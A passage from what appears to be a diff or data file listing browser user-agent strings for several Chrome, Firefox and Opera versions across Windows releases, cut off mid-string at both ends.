Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 6.3; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 +Mozilla/5.0 (Windows NT 6.1; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 6.3; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Mozilla/5.0 (Windows NT 6.1; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 6.3; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 10.0; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 +Mozilla/5.0 (Windows NT 6.1; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 6.3; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 10.0; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 +Mozilla/5.0 (Windows NT 6.1; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 6.3; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 10.0; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0 +Mozilla/5.0 (Windows NT 6.1; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 6.3; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 10.0; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 +Mozilla/5.0 (Windows NT 6.1; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 6.3; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 10.0; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0 +Mozilla/5.0 (Windows NT 6.1; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 6.3; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 10.0; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 +Mozilla/5.0 (Windows NT 6.1; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 6.3; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.164 Safari/537.36 OPR/77.0.4054.277 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.254 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.203 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.172 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.43 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 OPR/77.0.4054.146 +Mozilla/5.0 (Windows 